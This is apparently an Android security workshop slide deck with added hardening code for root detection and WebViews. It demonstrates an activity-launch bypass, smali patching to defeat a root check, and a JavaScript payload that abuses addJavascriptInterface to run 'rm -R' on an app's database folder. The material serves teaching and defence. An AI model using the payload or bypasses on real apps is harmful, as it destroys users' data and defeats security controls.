WHO AM I
- Next Generation problem solver
- Researcher & reader in free time
- Speaker at Null & OWASP Community
- Facilitator at Weekend Testing
- Bug bounty hunter (ex-crowd tester)
- Reported security vulnerabilities for 50+ unique customers all over the world, including Apple, Yahoo, Outlook, Adobe, etc.
- Love to develop nasty code & hack it :)
- Works as Security Researcher at Accenture Digital Mobility
- Certified Ethical Hacker, AKA Bug Wrangler
DISCLAIMER
This presentation is intended for educational purposes only and I cannot be held liable for any kind of damage done whatsoever to your machine, or other damages. Please don't try this attack on any other system without having context knowledge or permission; this may harm someone directly or indirectly.
Feel free to use this presentation for practice or education purposes.
It's in no way related to my employer; it's my own research and ideas.
^ I hope - You gotcha ^
SOCIAL MEDIA FEED
Hashtag for this session: #NullHumla, #MobileSecurity
Twitter handles for feedback: @null0x00, @Abhinav_Sejpal
???
~ WE AREN'T GOING TO DO THIS ~
So, feel free to stop when you have a doubt!
Are you Ready to Rock
The mobile market is fragmented; stakeholders want their better, cheaper, faster mobile app - correct?
What if it has vulnerable code? WOW :D
- Yet to update the stats -
PREREQUISITES CHECKS
- Genymotion Emulator
- Santoku Linux / Appie / Android Tamer
- Copy of shared APK(s): Here
BYPASS THE ACTIVITY VALIDATION
run app.activity.start --component sh.whisper sh.whisper.WInboxActivity
[email protected] - Password!
Smali code Analysis
Step 1. Reversing the APK to the JAR file (Java files)
dex2jar-2.0/d2j-dex2jar.sh bank.apk
STEP 6. PREPARE LOGICAL PATCH
We can't patch the Java code and get the binary
- We have to patch the smali code with new logic of isRooted
~ SUMMARY ~
Demo on missing root detection - Done
Demo on reversing the APK - Done
Demo on rebuilding the APK - Done
Demo on weak binary - Done
Fix: use DexGuard, not ProGuard; update the logical validation - Done
Identify attack surface in smali code - Done
Demo on patching the smali code - Done
Demo on APK signing - Done
Finally done the root detection bypass - Done
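The patch in the demo works because the app's root check is a single `isRooted` method whose one boolean return value can be flipped in smali. As an added example (not code from the slides; class and method names are assumptions), the check below spreads the decision over several independent indicators and returns a bitmask instead of one yes/no, so a defender can act on each indicator at different points in the app and report which ones fired to the server. Obfuscation (DexGuard, as the slides recommend) then makes those call sites harder to locate; client-side checks remain patchable, so the server should treat the result as a signal, not as proof.

```java
import android.os.Build;
import java.io.File;

// Added example, not from the slides: root indicators evaluated separately
// so that flipping one boolean in smali does not disable the whole check.
public final class RootIndicators {
    // Well-known su locations; illustrative, not exhaustive (assumption)
    private static final String[] SU_PATHS = {
        "/system/bin/su", "/system/xbin/su", "/sbin/su",
        "/system/app/Superuser.apk", "/data/local/xbin/su"
    };

    // Builds signed with AOSP test keys are usually custom/rooted ROMs
    public static boolean hasTestKeys() {
        String tags = Build.TAGS;
        return tags != null && tags.contains("test-keys");
    }

    // Direct lookup of a su binary at the usual paths
    public static boolean hasSuBinary() {
        for (String p : SU_PATHS) {
            if (new File(p).exists()) return true;
        }
        return false;
    }

    // Independent lookup of su through every PATH directory
    public static boolean suOnPath() {
        String path = System.getenv("PATH");
        if (path == null) return false;
        for (String dir : path.split(":")) {
            if (new File(dir, "su").exists()) return true;
        }
        return false;
    }

    // Bitmask of indicators that fired: bit 0 test-keys, bit 1 su path,
    // bit 2 su on PATH. Callers should check individual bits at several
    // points in the app rather than one central "if rooted" branch, and
    // send the mask to the server with each sensitive request.
    public static int score() {
        int s = 0;
        if (hasTestKeys()) s |= 1;
        if (hasSuBinary()) s |= 2;
        if (suOnPath()) s |= 4;
        return s;
    }
}
```

Usage: call `RootIndicators.score()` inside the activities that handle sensitive operations and include the mask in the request to the backend; the backend, not the app, decides what a non-zero mask means for that transaction.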
ANDROID WEB-VIEW
Android allows apps to create a bridge in order to render HTML and JavaScript and to let that page interact with the application's Java code, using the open source WebKit browser engine.
70 % of applications use WebViews
THERE IS A TWEAK WITH USAGE
- Disable support for JavaScript
- Disable support for plugins
- Disable file system access
WELL - HTTP VS HTTPS
WebView webview = new WebView(this);
webview.getSettings().setJavaScriptEnabled(false);
IDENTIFY THE APP WITH THE WEBKIT
- Reverse the binary
- Find the WebView code with addJavascriptInterface enabled
- Remember it's smali code
MALICIOUS JS VECTOR
<script>
var path = '/data/data/com.box.android/databases/---';
function execute(cmd){
    document.write("WebView Vulnerability");
    return window.Android.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}
execute(['/system/bin/rm', '-R', path]);
</script>
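The vector above reaches `java.lang.Runtime` by reflecting from whatever object was registered with `addJavascriptInterface`, and the three tweaks listed earlier (no JavaScript, no plugins, no file access) are what close that path when the page does not need a bridge. As an added example that is not code from the slides (the `HardenedWebView` class, the `Bridge` object, the `ALLOWED_HOST` value and the `create` method are all assumptions), this factory applies those settings together and shows the safe shape of a bridge when one is required: only methods annotated with `@JavascriptInterface` are callable from JavaScript once the app targets API 17 or higher, which is what stops the `getClass().forName(...)` walk, and navigation is restricted to HTTPS on one host so an attacker cannot inject script into the page over plain HTTP.

```java
import android.annotation.SuppressLint;
import android.content.Context;
import android.net.Uri;
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

// Added example, not from the slides: a WebView configured with the
// hardening settings discussed above. Names are assumptions.
public final class HardenedWebView {
    // Constructed placeholder for the one host the app is allowed to load
    private static final String ALLOWED_HOST = "example.com";

    // Java object exposed to page JavaScript as window.Android. With
    // targetSdkVersion >= 17 only @JavascriptInterface methods are reachable;
    // without the annotation (or on older targets) the page can walk
    // getClass().forName("java.lang.Runtime") as in the vector above.
    public static final class Bridge {
        @JavascriptInterface
        public String version() { return "1.0"; }
    }

    @SuppressLint("SetJavaScriptEnabled")
    public static WebView create(Context ctx, boolean needsJs) {
        WebView wv = new WebView(ctx);
        WebSettings s = wv.getSettings();
        s.setJavaScriptEnabled(needsJs);                 // off unless the page needs it
        s.setPluginState(WebSettings.PluginState.OFF);   // no plugins
        s.setAllowFileAccess(false);                     // no file:// access
        s.setAllowContentAccess(false);                  // no content:// access
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN) {
            s.setAllowFileAccessFromFileURLs(false);
            s.setAllowUniversalAccessFromFileURLs(false);
        }
        s.setSavePassword(false);
        // Remove bridge objects the platform itself may have injected
        wv.removeJavascriptInterface("searchBoxJavaBridge_");
        wv.removeJavascriptInterface("accessibility");
        wv.removeJavascriptInterface("accessibilityTraversal");
        if (needsJs) {
            wv.addJavascriptInterface(new Bridge(), "Android");
        }
        // Block any navigation that is not HTTPS to the allowed host
        wv.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                return !isAllowed(Uri.parse(url)); // true = do not load
            }
        });
        return wv;
    }

    // HTTP vs HTTPS: a bridge is only as safe as the page it is exposed to,
    // so only HTTPS pages from the expected host are ever loaded.
    static boolean isAllowed(Uri u) {
        return "https".equals(u.getScheme())
            && ALLOWED_HOST.equalsIgnoreCase(u.getHost());
    }
}
```

When reviewing smali for this pattern, the things to look for are the same settings in reverse: `setJavaScriptEnabled` with `true`, an `addJavascriptInterface` call whose target class has no `@JavascriptInterface` annotations, a `targetSdkVersion` below 17 in the manifest, and `http://` URLs passed to `loadUrl`.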
YES - I'M DONE!
Feel free to write me at bug.wrangler at outlook.com
Or
Tweet me at Abhinav_Sejpal
We need you!
Attend Null meet-ups & give presentations. Share your ideas & learnings. Talk to our community champions. Your feedback helps us to build a good community. Looking forward to your ongoing support.
http://null.co.in/
Say 'Hello' @null0x00
! THANK YOU !
@anantshri @oldmanlab @adi1391 @prateekg147 @5h1vang @exploitprotocol
#Nullblr Leads & Champions
Big thank you to @null0x00, Satish, Apoorva & you All
LICENSE AND COPYRIGHTS
Copyright 2015-2016 https://slides.com/abhinavsejpal/bangalore-android-null-humla/ Abhinav Sejpal
-----
( CC BY-NC-ND 3.0)
Attribution-NonCommercial-NoDerivs 3.0 Unported
Dedicated to my lovely daddy